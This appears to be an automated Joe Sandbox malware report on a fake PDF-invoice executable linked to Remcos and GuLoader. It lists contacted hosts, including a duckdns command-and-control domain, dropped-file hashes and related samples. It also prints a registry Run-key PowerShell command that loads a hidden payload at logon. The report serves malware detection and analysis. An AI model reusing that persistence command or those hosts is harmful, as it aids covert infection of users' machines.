            http://www.imvu.comrNubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://drive.google.com/xNubilum.exe, 00000010.00000002.3682803915.00000000027BA000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gplNubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.imvu.comNubilum.exe, Nubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://geoplugin.net/json.gptNubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000018.00000003.1652121291.000002CE97500000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.ver)svchost.exe, 00000018.00000002.3274791143.000002CE97600000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://drive.usercontent.google.com/Nubilum.exe, 00000010.00000003.1635199343.0000000002822000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gp&-Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.imvu.comppDataNubilum.exe, 0000001E.00000003.1694316092.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001E.00000003.1694047126.00000000009CD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.nirsoft.netNubilum.exe, 0000001C.00000002.1711868301.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorVyuctovani_2024_07-1206812497#U00b7pdf.exe, Nubilum.exe.2.drfalse
            • URL Reputation: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1646891249.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comNubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.google.comNubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/json.gpBNubilum.exe, 00000010.00000003.1668821147.0000000002871000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://g.live.com/odclientsettings/Prod1C:edb.log.24.drfalse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://drive.google.com/Nubilum.exe, 00000010.00000002.3682803915.0000000002798000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1653296484.0000000005A09000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.google.com/accounts/serviceloginNubilum.exefalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://login.yahoo.com/config/loginNubilum.exefalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://apis.google.comNubilum.exe, 00000010.00000003.1613936296.0000000002829000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://geoplugin.net/json.gpVNubilum.exe, 00000010.00000003.1661965344.000000001F588000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://geoplugin.net/3Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.nirsoft.net/Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1646891249.00000000049A1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.ebuddy.comNubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            142.250.186.161
            drive.usercontent.google.comUnited States
            15169GOOGLEUSfalse
            142.250.186.174
            drive.google.comUnited States
            15169GOOGLEUSfalse
            217.76.50.73
            a458386d9.duckdns.orgSweden
            39597SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSEtrue
            178.237.33.50
            geoplugin.netNetherlands
            8455ATOM86-ASATOM86NLfalse
            IP
            127.0.0.1
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1465858
            Start date and time:2024-07-02 07:38:06 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 43s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:35
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Vyuctovani_2024_07-1206812497#U00b7pdf.exe
            renamed because original name is a hash value
            Original Sample Name:Vyuctovani_2024_07-1206812497pdf.exe
            Detection:MAL
            Classification:mal100.phis.troj.spyw.evad.winEXE@23/23@4/5
            EGA Information:
            • Successful, ratio: 83.3%
            HCA Information:
            • Successful, ratio: 91%
            • Number of executed functions: 198
            • Number of non-executed functions: 262
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, audiodg.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, SgrmBroker.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 184.28.90.27
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 4836 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            01:38:56API Interceptor41x Sleep call for process: powershell.exe modified
            03:09:28API Interceptor3x Sleep call for process: svchost.exe modified
            03:09:59API Interceptor5621603x Sleep call for process: Nubilum.exe modified
            09:09:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run husmndenes %tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)
            09:09:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run husmndenes %tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            217.76.50.733443424611#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
              RFQ_22Q7305A-N23A-01#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                #U5e33#U55ae#U767c#U7968_200548224648#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                  LHDNM TAKSIRAN 2023#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                    faktura_7171503997#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      NTS_eTaxInvoice#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        178.237.33.506b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                        • geoplugin.net/json.gp
                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • geoplugin.net/json.gp
                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • geoplugin.net/json.gp
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a458386d9.duckdns.org3443424611#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        RFQ_22Q7305A-N23A-01#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        #U5e33#U55ae#U767c#U7968_200548224648#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        LHDNM TAKSIRAN 2023#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        faktura_7171503997#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        NTS_eTaxInvoice#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        2023-05-25_LG#Ud654#Ud559_#Ud611#Ub825#Uc0ac_#Ud3c9#Uac00_#Uc694#Uccad#Uc790#Ub8cc#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 91.193.75.231
                        geoplugin.net6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                        • 178.237.33.50
                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE3443424611#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        RFQ_22Q7305A-N23A-01#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        #U5e33#U55ae#U767c#U7968_200548224648#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        LHDNM TAKSIRAN 2023#U00b7pdf.exeGet hashmaliciousRemcosBrowse
                        • 217.76.50.73
                        faktura_7171503997#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        NTS_eTaxInvoice#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 217.76.50.73
                        original.emlGet hashmaliciousHTMLPhisherBrowse
                        • 217.76.53.169
                        https://link.mail.beehiiv.com/ls/click?upn=u001.CDTlMjzNHcWLSIPhu9vxt5tMbd1FOZMk96FNTGjZbRT0fKb7veVQPZjHc4lD0FASFx-2FBsOe7LVRjrZIHK-2FP7tzvNc-2BfeinG4M0Gj2fMTrdREae-2BZNDt-2BUzad3ykrpSFYK99XvX0Uu35ey-2FAaCnEDyjCCmeK3kY0w1qlJnqmN8LkyzyYQ7DAXyP31jV3w-2BnQE6T9ePzK-2FhJ3aeXO52BsvA7Dq9y5npfiEszfqwZ64qn2oPQLFe9twVmAFwtdKCKdwZUcSZVuKdF8Mo-2BwKv3TSkK-2Bmlm8Dp0hIVI0EPdS8Ud5PeRTk1lg9hFg5Vb6WRvacgkBxcChhPgTkqyDWeXnWClMDK4KM5nNYoPKyiPq1bm7JD9OUhWkWr9x3bmVpIHhtd8l5nhge83tphSzm8QyTjA-3D-3D6AK1_wGDEObODREJ1idSrm205iRpuE9msU4eXBNS9EY42l9YO2i-2BLB1AokSpkSV2Csktn0Qcky4Sn4mJJ-2BEfi3Gg4wGf3z2rpOFqRznDt8CDwchdbsdZX8c2HqBOxYPb2m05965jCRSkzxl4GjkYXQUaLCnHpTmSvurHodJ0wxVdejguy2Aj-2BUpv46M5lGZhmYR0xTJ2ZKxeVav7ENrHlX5VA8sJxKXoY6VSdHq0X-2FwEm6OLzwdd-2FLZd-2FcS58L2pXsb4-2BpcyRg4vogkuad6s48mzCJAfwbP1RBaiEaI681K5aVbRXS6pnP7gYmMsxVETv5-2FHWcG1pef-2BKcTplTfQQSLt5gkusN6rIKYYkFQ0FRfm30WuCt8aUZBY4RoHYQAh0vgkG3YFsh42M7uky7OxDZW0t8MeUTsDXIRgVUrbDcK86EO5BiIWtVUQEOVbnlwuRLdhQGet hashmaliciousHTMLPhisherBrowse
                        • 217.76.53.169
                        https://yesterwebring.neocities.orgGet hashmaliciousPhisherBrowse
                        • 217.76.57.30
                        C5CzixDMBu.elfGet hashmaliciousUnknownBrowse
                        • 89.150.248.52
                        ATOM86-ASATOM86NL6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                        • 178.237.33.50
                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 178.237.33.50
                        Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        Quotation.xlsGet hashmaliciousRemcosBrowse
                        • 178.237.33.50
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19Build.exeGet hashmaliciousDBatLoader, NeshtaBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        68#U2466.htaGet hashmaliciousUnknownBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        MOD_200.pdf.lnkGet hashmaliciousArc StealerBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        SecuriteInfo.com.Win32.BootkitX-gen.7605.8583.exeGet hashmaliciousBabuk, Clipboard Hijacker, DjvuBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        capisp.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        doc20240625-00073.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 142.250.186.161
                        • 142.250.186.174
                        No context
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8192
                        Entropy (8bit):0.35901589905449205
                        Encrypted:false
                        SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                        MD5:7D48941DB05D2D1C9A0C52739933543F
                        SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                        SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                        SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1310720
                        Entropy (8bit):0.71070959656735
                        Encrypted:false
                        SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqd:2JIB/wUKUKQncEmYRTwh0B
                        MD5:3D137F5655E925BDA2E0F4615F361310
                        SHA1:E0BB6F703BCB6FFD02187E0FF45FBEF1081198B7
                        SHA-256:E5584D146AFA5C98B0688DD4722A75763794B4600C04784504B50EDE7F6289D8
                        SHA-512:8F68E68824451F3C7CCFFEED7AB88995E181C665E667645145C06611AFC95019F42A4F7CD6E74FFA55C07071D9DEC7767BA778FE0D5FF2404D99932C4931C8FA
                        Malicious:false
                        Reputation:low
                        Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfaa00507, page size 16384, Windows version 10.0
                        Category:dropped
                        Size (bytes):1310720
                        Entropy (8bit):0.6650794253082756
                        Encrypted:false
                        SSDEEP:1536:9SB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:9azaU+uroc2U5Si6
                        MD5:0EA7AE859D0482064CF0702F44DB7F59
                        SHA1:62E6751D15AEDCA345F85BA091E63213653A0D7D
                        SHA-256:248A993C73BDC41816760F8B19444A217DC8E8D958A7ABC03580B078348AC095
                        SHA-512:E56D0A2FD9F53E00B6113712F5350B6638A9BB01345032DB96A500E9A904C0A63455D014D37B3D7F00B73C622A6550412051D20AAAA318F56C46C94F7922F81E
                        Malicious:false
                        Preview:....... .......#.......X\...;...{......................0.e.....(....|Q......|_.h.b.....(....|Q.0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................=IW@(....|Q....................F(....|Q..........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.07860830954606411
                        Encrypted:false
                        SSDEEP:3:nltWetYeOmWK17e3Zehde1CNmP1allkqqG9lXlZOS:ldztM38C4KQVr
                        MD5:7E1EF76760D619E1AEA58FE11E646D74
                        SHA1:274397C7CF1C86E89310F45D66372A1185F85616
                        SHA-256:FE5B8962177075EBABCF4D918EB1D6CAA8850792DF48690F1A62F73D81FC0E0B
                        SHA-512:07529FF218515AFD39210F304B42373F6F5727FC72532758A7828E0CC8FE6306478E3DD64D420B289C32EFA4BD886B81E9987C6DD36682FAEF80B386D96A53A3
                        Malicious:false
                        Preview:.m.......................................;...{.......|_.(....|Q.........(....|Q.(....|Q...Fn(....|Q....................F(....|Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):296
                        Entropy (8bit):7.298683179686563
                        Encrypted:false
                        SSDEEP:6:i+APODsRwXJKBDeq0lE1E79ZEPeDU8x2FwDh+Uuf0blS+9PeSsmIXb:/APCsa5k10l55Mp8x2FwDMl+9PYmI
                        MD5:0536E2BE9213875892A4019A178ABB4C
                        SHA1:7B989EC024A167D8FDE9D2D326AB4157818FD637
                        SHA-256:40E6ECD768E309ADDBCBF545D0B5479A476348DB41C0F2D8935AD39F743D21C3
                        SHA-512:C0FABE3D40A0AAB87A2486CA1C72C743D1F19709C5BE9F37EF4C4E9CE7A5E26C007C2C0DEA66729F60BFFEA02645BA3A5A97A6D9662847992BB0EEB31C8F7BF7
                        Malicious:true
                        Preview:...UN.!.VX....5r...."..{.V.qW.`..g..I.K..1..G...:R(wC....,A..h.K.'..B.....p.n#K...................sz..a-..1.....X%{...tsV.wj..)iq.O. .rG.J(.6..Cr|.....W.4.<.;B}.&u!..:....Z."..F&D.1..h.J.p....S.....l..........$....._..r.....j.8..K.d=.s#...7...%.a.._.A~.b.@...I.Gt..GXF..`...{..>........6
                        Process:C:\Users\user\AppData\Local\Temp\Nubilum.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):962
                        Entropy (8bit):5.013130376969173
                        Encrypted:false
                        SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                        MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                        SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                        SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                        SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                        Malicious:false
                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):8003
                        Entropy (8bit):4.840877972214509
                        Encrypted:false
